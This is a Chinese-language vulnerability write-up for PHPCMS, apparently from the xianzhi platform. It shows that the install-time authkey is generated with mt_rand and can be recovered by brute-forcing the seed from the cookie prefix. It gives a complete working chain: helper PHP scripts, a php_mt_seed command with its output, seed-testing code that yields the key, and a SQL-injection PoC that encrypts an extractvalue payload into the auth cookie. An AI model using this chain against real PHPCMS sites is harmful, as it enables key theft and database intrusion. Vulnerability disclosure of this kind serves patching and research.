PHPCMS authkey泄露导致注入

1. 发布时间：2017-04-28
2. 公开时间：N/A
3. 漏洞类型：sql注入
4. 危害等级：高
5. 漏洞编号：xianzhi-2017-04-93356191
6. 测试版本：N/A

---

漏洞详情

install/install.php 184行

if($module == 'admin') {
    $cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';
    $authkey = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

安装过程中初始化的2个随机值 一个是cookie前缀 一个是牛逼的auth_key
来看看random函数

function random($length, $chars = '0123456789') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

可以看到使用mt_rand来生成随机数
mt_rand有个坑 研究过的人不少 就是随机数种子不是很强可以被爆破，而且php在一次访问中只会自动播种一次种子。看上面，在这一次访问中 共调用了5+20次mt_rand 而且前5次的值可知（cookie前缀），足够我们计算出随机数种子从而自己计算auth_key的值

利用过程

首先注册个账号 记录cookie值 比如我这里

oitzp__userid:4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA

oitzp就是cookie_pre
先用个小脚本生成参数

$s = 'oitzp';
$str = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';
echo crack($s,$str);
function crack($s,$str){
    for($i=0;$i<strlen($s);$i++){
        echo strpos($str,$s[$i])." ".strpos($str,$s[$i])." 0 51 ";
    }
}

得到

14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51

开始爆破

./php_mt_seed 14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51

大概几分钟后得到结果

Pattern: EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52
Found 0, trying 33554432 - 67108863, speed 25228896 seeds per second
seed = 62227301
Found 1, trying 369098752 - 402653183, speed 26383041 seeds per second
seed = 392301305
seed = 393361608
Found 3, trying 738197504 - 771751935, speed 25992869 seeds per second
seed = 762840031
Found 4, trying 872415232 - 905969663, speed 25995686 seeds per second
seed = 903576050
Found 5, trying 1610612736 - 1644167167, speed 26116632 seeds per second
seed = 1625886859
Found 6, trying 1677721600 - 1711276031, speed 26120529 seeds per second
seed = 1708791794
Found 7, trying 1845493760 - 1879048191, speed 26121638 seeds per second
seed = 1850496645
Found 8, trying 2315255808 - 2348810239, speed 26072700 seeds per second
seed = 2327183983
Found 9, trying 2449473536 - 2483027967, speed 26049915 seeds per second
seed = 2453737360
Found 10, trying 2818572288 - 2852126719, speed 26083400 seeds per second
seed = 2821134341
Found 11, trying 3187671040 - 3221225471, speed 26049448 seeds per second
seed = 3195112468
Found 12, trying 3321888768 - 3355443199, speed 26056073 seeds per second
seed = 3355185931
Found 13, trying 3355443200 - 3388997631, speed 26029347 seeds per second
seed = 3370877999
Found 14, trying 3623878656 - 3657433087, speed 25983212 seeds per second
seed = 3635705652
Found 15, trying 3959422976 - 3992977407, speed 25973648 seeds per second
seed = 3976924131
Found 16, trying 4060086272 - 4093640703, speed 25997863 seeds per second
seed = 4070165693
Found 17, trying 4261412864 - 4294967295, speed 26030253 seeds per second
Found 17

总共有17个可能的随机数种子 收集一下丢给下一个脚本

$seeds = array(62227301,392301305,393361608,762840031,903576050,1625886859,1708791794,1850496645,2327183983,2453737360,2821134341,3195112468,3355185931,3370877999,3635705652,3976924131,4070165693);
for($i=0;$i<17;$i++){
    mt_srand($seeds[$i]);
    $cookie_pre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';
    $auth_key = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    if (authcode("4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA","DECODE",$auth_key) == "1"){ 
    //上面的1是注册的uid
    //可以从index.php?m=member&c=index&a=account_manage_info&t=1拿到
        echo $seeds[$i]."\n".$auth_key;
    }
}

得到结果：

3370877999
fkedKUovc9hFpKvX0hcH

就这么分分钟拿到可auth_key
简单演示下注入
phpcms/modules/member/class/foreground.class.php 19行

   final public function check_member() {
        $phpcms_auth = param::get_cookie('auth');
        if(ROUTE_M =='member' && ROUTE_C =='index' && in_array(ROUTE_A, array('login', 'register', 'mini','send_newmail'))) {
            if ($phpcms_auth && ROUTE_A != 'mini') {
                showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index');
            } else {
                return true;
            }
        } else {
            //判断是否存在auth cookie
            if ($phpcms_auth) {
                $auth_key = $auth_key = get_auth_key('login');
                list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
                //验证用户，获取用户信息
                $this->memberinfo = $this->db->get_one(array('userid'=>$userid));

$userid来自cookie且经过2次sys_auth加密 无视防御
poc:

$str = "1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)));#\tasdf";
$en1 = authcode($str,"ENCODE",get_auth_key("login"));
$en2 = authcode($en1,"ENCODE",'fkedKUovc9hFpKvX0hcH');//刚才拿到的auth_key
echo urlencode($en2);
function get_auth_key($prefix,$suffix="") {
    if($prefix=='login'){
        $pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.'192.168.199.171');//本机IP
    }else if($prefix=='email'){
        $pc_auth_key = md5('fkedKUovc9hFpKvX0hcH');
    }else{
        $pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.$suffix);
    }
    $authkey = md5($prefix.$pc_auth_key);
    return $authkey;
}

修改cookie oitzp_auth值为生成的payload
访问/index.php?m=member即可看到报错信息

view.png